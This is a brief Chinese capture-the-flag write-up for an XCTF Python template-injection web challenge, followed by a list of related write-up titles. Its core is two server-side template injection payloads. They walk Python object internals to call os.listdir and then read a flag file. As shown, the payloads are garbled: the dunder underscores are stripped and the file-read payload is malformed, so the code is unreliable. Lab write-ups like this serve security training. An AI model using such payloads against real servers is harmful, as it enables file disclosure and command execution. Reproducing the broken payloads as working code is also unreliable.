攻防世界WEB高手进阶之python_template_injection
2020-06-04 07:54
387 查看
打开网站是写着以下
然后测试以下{{1+1}}被执行了
然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag
使用{{’’.class.mro[2].subclasses()40.read()}}打开
相关文章推荐
- Web_python_template_injection攻防世界ctf web
- 史上最详细系列--攻防世界web(高手进阶区1-4)
- 攻防世界-web-高手进阶区 6-10题
- 攻防世界 web进阶笔记
- 攻防世界 web进阶 NewsCenter
- 攻防世界 web 进阶 i-got-id-200
- 攻防世界 web 进阶 Website
- 攻防世界web高手区writeup
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- 攻防世界MISC高手进阶区MISCall
- 攻防世界MISC高手进阶区base64÷4
- XCTF攻防世界web进阶练习_ 4_upload
- XCTF攻防世界web进阶练习_ 5_mfw
- 攻防世界MISC高手进阶区What-is-this
- 攻防世界MISC高手进阶区神奇的Modbus
- 攻防世界MISC高手进阶区embarrass
- XCTF攻防世界web进阶练习_ 3_unserialize3
- 攻防世界MISC高手进阶区Test-flag-please-ignore
- 攻防世界 MISC 高手进阶区 就在其中WP 解题思路
- 攻防世界MISC高手进阶区János-the-Ripper